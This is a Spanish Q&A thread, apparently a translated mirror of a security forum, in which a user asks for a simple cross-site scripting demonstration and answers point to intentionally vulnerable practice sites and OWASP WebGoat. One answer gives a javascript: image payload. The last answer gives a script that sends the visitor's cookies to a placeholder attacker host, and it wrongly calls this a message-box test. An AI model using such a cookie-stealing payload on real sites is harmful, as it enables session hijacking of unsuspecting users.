Un ejemplo simple de un ataque de scripting entre sitios [cerrado]

¿Puede alguien mostrarme un ataque Cross-site scripting en efecto en mi navegador? ¿Hay algún ejemplo en Internet que haga esto? No he encontrado esto en Internet.

Cuanto más simple sea el ejemplo, mejor.

 32
xss
Author: Skuli, 2012-03-06
Source

4 answers

Véase http://www.insecurelabs.org y http://www.insecurelabs.org/task /

Intencionalmente vulnerable a XSS en el campo de búsqueda y varios otros lugares.

 31
Author: Erlend,
Warning: date(): Invalid date.timezone value 'Europe/Kyiv', we selected the timezone 'UTC' for now. in /var/www/agent_stack/data/www/ajaxhispano.com/template/agent.layouts/content.php on line 61
2012-03-07 06:55:55

Generalmente tendrá que instalar su propio software del lado del servidor para un ejemplo XSS en vivo. No muchos sitios legítimos abrirán un defecto XSS intencionalmente a los internautas.

Una pieza ya hecha de software del lado del servidor que le permite demostrar XSS (entre muchas otras cosas) a sí mismo es WebGoat de OWASP. Aquí están instrucciones para instalar WebGoat y demostrar XSS. Encontrará ejemplos adicionales de fragmentos de programa que habilitan XSS en el artículo de OWASP " Cross-site scripting (XSS) ".

 6
Author: minopret,
Warning: date(): Invalid date.timezone value 'Europe/Kyiv', we selected the timezone 'UTC' for now. in /var/www/agent_stack/data/www/ajaxhispano.com/template/agent.layouts/content.php on line 61
2012-03-06 12:58:16

<img src="javascript:alert('hello everybody')"></img> La etiqueta de imagen que inserté es un ejemplo de xss. el src anterior contiene el script java que le avisa.

 6
Author: user3176091,
Warning: date(): Invalid date.timezone value 'Europe/Kyiv', we selected the timezone 'UTC' for now. in /var/www/agent_stack/data/www/ajaxhispano.com/template/agent.layouts/content.php on line 61
2014-01-09 05:03:59

La forma simple también sería: Si el cuadro de mensaje aparece, ya sabes, que la página o el servidor es vulnerable. 

  <script>window.location = 'haxxed.com? cookie=' + document.cookie</script>

Una gran muestra de cómo funciona la técnica se puede encontrar aquí https://www.hacksplaining.com/exercises/xss-stored

 0
Author: RiftOut,
Warning: date(): Invalid date.timezone value 'Europe/Kyiv', we selected the timezone 'UTC' for now. in /var/www/agent_stack/data/www/ajaxhispano.com/template/agent.layouts/content.php on line 61
2017-09-12 18:47:30